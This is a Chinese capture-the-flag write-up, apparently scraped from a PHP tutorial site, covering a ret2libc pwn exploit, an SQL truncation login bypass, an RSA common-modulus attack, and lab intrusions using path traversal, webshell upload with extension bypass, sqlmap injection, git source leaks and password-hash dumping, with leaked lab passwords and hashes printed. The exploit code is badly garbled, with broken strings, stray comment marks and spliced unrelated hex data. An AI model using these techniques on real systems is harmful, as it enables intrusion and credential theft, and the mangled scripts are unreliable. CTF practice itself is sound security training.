這是一道比較簡單的PWN題目,首先拖到IDA裡簡單看了一下程序,如圖
發現在讀取,沒有堆疊保護,所以,在read0x34時,可能會替換game返回址址,先透過write(1,write,4)(game作為write回傳地址)。這樣讀出write位址,這樣就可以得到system位址,因為又循環運作了,同樣在0x804A06C寫入/bin/sh\0,這樣system就能運作。
Pythonexp如下:
frompwn import *
#defrungameAgainPoc(p,yourname,flag):
p.recvuntil("First,what's your name? \n")
p.send(yourname "\n")
p.recvuntil("doyou want to get flag?\n")
p.send (flag)
pwnelf= ELF("./pwn")
libcelf= ELF("./libc-2.23.so")
#gameadd= 0x080485CB
!
#plt_write= pwnelf.symbols['write']
got_write= pwnelf.got['write']
## cover("0100070D020108080D000103040D0303")
cover("02080602")## cover("02080602")## cover("02080602")## cover("02080602")## 50 0D02")
#printlen(var_6c)
byte_402178= """02 02 02 02 03 01 01 02
0101 02 01 01 00 01 01 02 02 00 01 01 00 01 01 02 02 00 01 01 01 01 01 0102 02 00 01 01 01 01# 0101120102 01 02 02 01 01 01 01 01 02 01
0103 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00#100 1 02 0D 07 00 01
060C 01 07 0B 00 06 02 01 06 01 07 02 0D 05 01
0000 00 00 EF 28 68 5000 4800 00 00 E4 22 00 00 E4 16 00 00 00 00 00 00
EF28 68 5B 00 00 00 00 0C 00 00 00 10 00 00 00 00 00 00 00 00 00 EF 28 68 5B
0000 00 00 0D 00 00 00 54 02 00 00 40 23 00 00
4017 00 0 00
0E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
A000 00 00 00 00 00 00
#A000 00 00 00 00 00 00#A000 00 000000# 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000 000# 0 00 00 00 00 30 40 00
E022 40 00 01 00 00 00 E8 20 40 00 00 00 00 00
0000 00 00 00 00 00 00 00 01 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 0#0#0000 00# 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00"""#replace"#. ("\r","").replace("\n","").decode("hex")
byte_402138= """00 00 00 00 01 00 00 00
## ##0200 00 00 03 00 00 00 04 00 00 00 05 00 00 00######0600 00 00 07 00 00 00 0#08 0090 00 07 000# 00 00 00 0C 00 00 00 0D 00 00 00######0E00 00 00 0F 00 00 00"""###.replace("","").replace("\r","").replace("\n","").decode("hex")
dword_403018=" ""0200 00 00 02 00 00 00
0200 00 00 02 00 00 00 00 00 00 00 00 00 00 00##place#place#"".re.(place#" ("\r","").replace("\n","").decode("hex")
#text:0040110E mov ecx, [ebp var_4]
.text:00401111 xor ecx, ebp.text:00401113 111D mov dword_403020, 6#.text:00401127 mov dword_403024, 7#記憶體值有改變,所以修改一下dword_403018= dword_403018[0:4] '\x03' dword_403018[5:8]## '\x06' dword_403018[9:12] '\x07'
dword_403018[13:]
printdword_403018.encode("hex")
printdword_403018.encode("hex")
dword_403018.encode("hex") ,42):
hightnum= ord(dword_403018[ord(byte_402178[i])*4])
numbershow= hightnum ord(byte_402138[# numbershow= hightnum ord(byte_402138[ ])*4])
printchr(numbershow),
#flag{06b16a72-51cc-4310-88ab-70ab68290e22}
#0x03 sqli
#0x03 sqli#0x03 sqli
#0x03 sqli#0x03 sqli
#0x03 sqli#0x03 sqli
#C問題。是sql約束攻擊,註冊用戶名為“admin ”,密碼為符合規定的密碼就可以,然後登陸就能看到flag
flag{b5a1f9c5-ac30-4e88-b460-e90bcb65bd70}
0x04 RSA
opensslrsa -inform PEM -in pubkey1.pem -pubin -text
Public-Key:(2048 bit)
Modulus:
00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:
3c:99:57:7f:89:78: 04:8d:e5:43:6b:ef:c3:0d:8d:
8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57: 30:6e:
bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:
a1:a3: f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:
c9:52:57:a1:49:a9:7f:59:54: ea:f8:93:41:14:7a:
dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:
ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:
4c:7d:9a:c4:6b: d6:b5:f3:22:b2:b5:72:8b:a1:48:
70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c: e3:e0:17:
03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:
79: b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:
ee:66:b1:5a:ff:23:3f:c7: 7b:55:8a:48:7d:a5:95:
2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:
e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:
# e7:24:81:db: 25:68:aa:82:9e:ea:c8:7d:20:1a:5a:
8f:f5:ee:6f:0b:e3:81:92:ab:28:39: 63:5f:6c:66:
42:17
Exponent:2333 (0x91d)
opensslrsa -inform PEM -in pubkey2.pem -pubin -text
opensslrsa -inform PEM -in pubkey2.pem -pubin -textPublic-Key:(2048 bit)Modulus: 00:89:89:a3:98:98:84:56:b3:fe:f4:a6: ad:86:df: 3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:# 8c: 94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e: bb:8d:e3:6c:2c:39:6a:84: ef:dc:5d:38:25:02:da: a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4: c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a: dc:dd:4e:95: 0f:ff:74:e3:0b:be:62:28:76:b4:2e: ea:c8:6d:f4:ad:97:15:d0:5b:56:04: aa:81:79:42: 4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:# 70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17: 03:f0:4f:94:a4:31:d9: 95:4b:d7:ae:2c:7d:d6:e8: 79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b: d9: ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:###### 2f:be:2b: 92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:###### e3:6a:5e:d8:2d:5c:1b:2a:eb:0e: 45:be:e4:05:cb:###### e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:#### ## 8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:###### 42:17######Exponent:23333# 42:17######Exponent:23333# 42:17######Exponent:23333# (0x5b25).######可見,這兩個公鑰n是一樣的,只是e不同,使用RSA的共模攻擊######Python如下:######fromlibnum import n2s ,s2n######fromgmpy2 import invert######importbase64######importgmpy2######defbignumber(n):###### n= n.decode("hex ")###### rn= 0###### forb in n:###### rn= #lt; bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:a1:a3:f3:b6:e9:75 :02:d2:e3:1c:84:93:30:f5:b4:
c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41 :14:7a:
dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:
ea:c8 :6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:
4c:7d:9a:c4:6b:d6:b5:f3:22 :b2:b5:72:8b:a1:48:
70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:
03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:
# 79:b3:5f:8a:2d :4a:5e:fb:e7:37:25:7b:f9:9b:d9:
ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48 :7d:a5:95:
2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:
# e3 :6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:
e7:24:81:db:25:68:aa:82 :9e:ea:c8:7d:20:1a:5a:
8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66 :42:17"""
.replace(":",").replace("",").replace("\r",").replace("\n" ,"" )
##printn
n =bignumber(n)
printhex(n)
e1= 2333
#e2 =23333
defegcd(a,b):
ifa == 0:
return(b,0,1)
else:
g,y,x=egcd(b%a,a)
return(g,x - (b //a)*y,y)
#flag1 = base64 .b64decode (open("flag1.enc","rb").read())
flag2 = base64.b64decode(open("flag2.enc","rb").read())
c1= s2n(flag1)
c2= s2n(flag2)
c2= 反轉(c2,n)
##s= egcd(e1, e2)
#列印
s =gmpy2.gcdext(e1,e2)
##列印
s1= s[1]
s2= 0 - s[2]
prints1
prints2
m =pow(c1,s1,n) * pow(c2,s2,n) % n
printn2s(m)
flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe}
0x05 拋磚引玉
#1.根據版本,
1.根據版本,##在wooyun鏡像站找到漏洞細節,網站存在註入,但是資料庫使用者表為空,另外發現發現檔案下載漏洞,down.php?urls=data/../config .php下載檔案發現DB_user/mvoa使用者的密碼define('DB_PWD','B!hpp3Dn1.');flag值:B!hpp3Dn1.2.http://url/www.zip,取得網站備份文件,在config.php中找到DB_user/root使用者的密碼define('DB_PWD','mypasswd' ); flag值:mypasswd0x06暗度陳列1.發現下載路徑/u-are-admin/download.php?dl= 顯示檔案查找(u-Are-Admin/u-upload-file資料夾),找到關鍵目錄/u-Are-Admin/flag值:/u-Are-Admin /2.在/u-Are-Admin/目錄,可以上傳文件,上傳Php(大小寫繞過)文字木馬,菜刀鏈接,netuser查看系統管理員Hack用戶的全名
flag: Hacked3563.c771f0x07瞞天過海
## 1 1awvs 掃到注入點
##/Cat.php? ID = 2## SQLMAP 直接功能, , 透過即刻取得後台明文密碼, , , , , , , , , , , , , serverlog
flag 值:serverlog
#2.注入root的密碼hash,
*21C5210729A90C69019F01FED76FAD4654F27167
然後cmd5解密得rootserver
#flag值:rootserver
3.內容
/classes/downloadfile .php?file=../../../../../../password.txt
flag值:c9c35cf409344312146fa7546a94d1a6
#0x08 偷梁換柱換柱
# 1.AWVS掃到./git源碼洩露,用工具GitHack下載所有源碼,在資料庫檔案中找到用戶名,密碼(adminAdmin@pgsql)
flag值:Admin@pgsql
2 .掉小,即使檔案真正地址,
/admin/uploads/111.php.png
# 。
3. 菜刀能夠直接查看/tmp/access 16位元
##0x09 .log的內容的前16位元
0x09 ,然後getshell,建構路徑為
url/info/include.php?filename=..//sjk-uploads/UareHack.txt
#密碼是a,得到shell取得可以phpStudy目錄下Documents.txt的內容
2.取得shell可以取得ichunqiu使用者桌面根目錄password.txt的內容
3.getshell後,傳msf木馬無法反彈,最後使用QuarksPwDump HASH,線上破解取得密碼
78beaa5511afa889b75e0c8d76954a50:4ffe895918a454ce0f872dad8af0b4da:::
flawe值:123q#
以上是如何分析CTF題的writeup的詳細內容。更多資訊請關注PHP中文網其他相關文章!
